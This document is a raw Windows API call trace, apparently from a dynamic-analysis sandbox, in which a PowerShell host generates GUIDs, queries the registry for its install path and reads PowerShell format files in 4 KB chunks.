	[0753.804] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x9f11e34a, Data2=0x768e, Data3=0x4f7f, Data4=([0]=0xa4, [1]=0xed, [2]=0x31, [3]=0x4e, [4]=0xed, [5]=0x37, [6]=0x54, [7]=0x2d))) returned 0x0
	[0753.805] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x6210e5ec, Data2=0x308d, Data3=0x420d, Data4=([0]=0xb9, [1]=0xdd, [2]=0xd8, [3]=0x3a, [4]=0x97, [5]=0x89, [6]=0x6d, [7]=0x48))) returned 0x0
	[0753.805] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x6bb5349a, Data2=0xad67, Data3=0x4244, Data4=([0]=0x92, [1]=0xe7, [2]=0x46, [3]=0x72, [4]=0xb4, [5]=0x8, [6]=0x20, [7]=0x7e))) returned 0x0
	[0753.805] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x47005102, Data2=0xcc8a, Data3=0x4dca, Data4=([0]=0xa2, [1]=0x5b, [2]=0x5a, [3]=0x71, [4]=0xab, [5]=0x7f, [6]=0x15, [7]=0x87))) returned 0x0
	[0753.805] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x97207ebc, Data2=0x320b, Data3=0x46aa, Data4=([0]=0xac, [1]=0x73, [2]=0x26, [3]=0x83, [4]=0x54, [5]=0xa, [6]=0x4f, [7]=0xad))) returned 0x0
	[0753.805] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x5d294337, Data2=0x6ea1, Data3=0x4a21, Data4=([0]=0x93, [1]=0xcf, [2]=0xc9, [3]=0xc0, [4]=0x9a, [5]=0xfe, [6]=0xa3, [7]=0xfd))) returned 0x0
	[0753.805] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2ba1c25b, Data2=0xf41c, Data3=0x485c, Data4=([0]=0xb9, [1]=0x3d, [2]=0x50, [3]=0x6d, [4]=0xb9, [5]=0x86, [6]=0x51, [7]=0xd6))) returned 0x0
	[0753.806] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x8b5e352a, Data2=0xd459, Data3=0x4e2d, Data4=([0]=0x92, [1]=0x53, [2]=0x80, [3]=0x62, [4]=0xe3, [5]=0x70, [6]=0x3, [7]=0xf8))) returned 0x0
	[0753.806] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xd76cb624, Data2=0xf327, Data3=0x4c7b, Data4=([0]=0x8a, [1]=0x12, [2]=0x4f, [3]=0x11, [4]=0x8b, [5]=0x5a, [6]=0x41, [7]=0xc3))) returned 0x0
	[0753.806] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x827a588f, Data2=0x401, Data3=0x44bd, Data4=([0]=0xa6, [1]=0xab, [2]=0x2d, [3]=0x3f, [4]=0xe0, [5]=0x8d, [6]=0x56, [7]=0x5))) returned 0x0
	[0753.807] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xd0a6b978, Data2=0x9158, Data3=0x4e1f, Data4=([0]=0x8e, [1]=0xc1, [2]=0x7, [3]=0xf9, [4]=0x3a, [5]=0x3, [6]=0x6a, [7]=0x83))) returned 0x0
	[0753.807] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xe892e610, Data2=0x9780, Data3=0x451f, Data4=([0]=0xa3, [1]=0xe6, [2]=0x20, [3]=0x6b, [4]=0x5c, [5]=0xe0, [6]=0xfa, [7]=0xca))) returned 0x0
	[0753.808] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x38d8d200, Data2=0xed85, Data3=0x4d31, Data4=([0]=0x96, [1]=0x5d, [2]=0x66, [3]=0xa0, [4]=0xde, [5]=0xb, [6]=0xd6, [7]=0xea))) returned 0x0
	[0753.808] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2d6c5ab8, Data2=0xdb48, Data3=0x48ce, Data4=([0]=0xaa, [1]=0x9b, [2]=0x31, [3]=0x7, [4]=0xb8, [5]=0xf4, [6]=0x5f, [7]=0x4e))) returned 0x0
	[0753.808] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa3b50327, Data2=0x547d, Data3=0x4194, Data4=([0]=0xbd, [1]=0xa7, [2]=0x30, [3]=0x2a, [4]=0x15, [5]=0x53, [6]=0xff, [7]=0xc0))) returned 0x0
	[0753.808] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x89f3a373, Data2=0x6fc5, Data3=0x457b, Data4=([0]=0xab, [1]=0x5c, [2]=0x37, [3]=0xa9, [4]=0x98, [5]=0x79, [6]=0x99, [7]=0xa6))) returned 0x0
	[0753.809] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xdea332b0, Data2=0xbae0, Data3=0x4374, Data4=([0]=0x9f, [1]=0xff, [2]=0xbc, [3]=0x5, [4]=0x25, [5]=0x34, [6]=0xc2, [7]=0xb6))) returned 0x0
	[0753.809] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x3c53e43d, Data2=0xc527, Data3=0x4af6, Data4=([0]=0xb0, [1]=0x3, [2]=0x3b, [3]=0x3c, [4]=0xe5, [5]=0xed, [6]=0x8a, [7]=0xbf))) returned 0x0
	[0753.809] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2e5f1717, Data2=0xb0aa, Data3=0x4db8, Data4=([0]=0xb5, [1]=0xe0, [2]=0x71, [3]=0x17, [4]=0x2e, [5]=0x9, [6]=0x55, [7]=0x5a))) returned 0x0
	[0753.810] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x48bcc5b1, Data2=0x6a6f, Data3=0x466a, Data4=([0]=0x8f, [1]=0x71, [2]=0xe, [3]=0x7b, [4]=0xdb, [5]=0xea, [6]=0xda, [7]=0x4c))) returned 0x0
	[0753.810] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x5cbbc756, Data2=0xbd06, Data3=0x4e8d, Data4=([0]=0x94, [1]=0x4a, [2]=0x82, [3]=0x2c, [4]=0xbb, [5]=0x92, [6]=0x9a, [7]=0x95))) returned 0x0
	[0753.814] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xb2320f0e, Data2=0x58a9, Data3=0x42e2, Data4=([0]=0xb4, [1]=0xf1, [2]=0x8, [3]=0xde, [4]=0x90, [5]=0x61, [6]=0x17, [7]=0x18))) returned 0x0
	[0753.814] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0753.815] GetFileType (hFile=0x310) returned 0x1
	[0753.815] SetErrorMode (uMode=0x1) returned 0x1
	[0753.815] GetFileType (hFile=0x310) returned 0x1
	[0753.815] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.817] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.818] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.818] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.820] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.820] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.820] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x119, lpOverlapped=0x0) returned 1
	[0753.820] ReadFile (in: hFile=0x310, lpBuffer=0x34be680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x34be680*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0753.821] CloseHandle (hObject=0x310) returned 1
	[0753.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0753.821] SetErrorMode (uMode=0x1) returned 0x1
	[0753.821] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0753.821] SetErrorMode (uMode=0x1) returned 0x1
	[0753.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0755.017] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x310) returned 0x0
	[0755.017] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0755.017] CoTaskMemAlloc (cb=0x5a) returned 0x39aab0
	[0755.018] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x39aab0, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0755.018] CoTaskMemFree (pv=0x39aab0) 
	[0755.018] RegCloseKey (hKey=0x310) returned 0x0
	[0755.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0755.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0755.019] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.020] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x66644190, Data2=0x4136, Data3=0x4f55, Data4=([0]=0xb2, [1]=0x42, [2]=0x65, [3]=0x3f, [4]=0xd3, [5]=0x49, [6]=0xe2, [7]=0x7a))) returned 0x0
	[0755.021] VirtualQuery (in: lpAddress=0xebc80, lpBuffer=0xecb40, dwLength=0x30 | out: lpBuffer=0xecb40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.024] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa6fa9f5e, Data2=0x7ca9, Data3=0x4de3, Data4=([0]=0xb7, [1]=0xab, [2]=0x98, [3]=0xc8, [4]=0xe6, [5]=0xd9, [6]=0x7d, [7]=0x79))) returned 0x0
	[0755.024] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x30e520f4, Data2=0x2fa5, Data3=0x43d9, Data4=([0]=0xa9, [1]=0x0, [2]=0xf5, [3]=0xc4, [4]=0xf4, [5]=0x41, [6]=0xbe, [7]=0x7b))) returned 0x0
	[0755.025] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2d238615, Data2=0x41c1, Data3=0x4d16, Data4=([0]=0x86, [1]=0x20, [2]=0x89, [3]=0x3b, [4]=0x37, [5]=0xd4, [6]=0x65, [7]=0xda))) returned 0x0
	[0755.025] VirtualQuery (in: lpAddress=0xebc80, lpBuffer=0xecb40, dwLength=0x30 | out: lpBuffer=0xecb40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.026] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0755.026] GetFileType (hFile=0x310) returned 0x1
	[0755.026] SetErrorMode (uMode=0x1) returned 0x1
	[0755.026] GetFileType (hFile=0x310) returned 0x1
	[0755.026] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.027] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.028] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.028] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.028] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.028] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.028] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.028] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.031] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.031] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.032] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.032] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.032] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.033] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.033] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.033] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.037] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.037] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.037] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.038] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.038] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.038] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.039] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.039] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.040] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.040] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.040] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.041] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.041] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.041] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.042] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.042] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.048] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.049] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.049] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.049] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.050] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.050] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.050] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.051] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.051] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.051] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.052] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.052] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.053] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.053] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.053] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.054] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
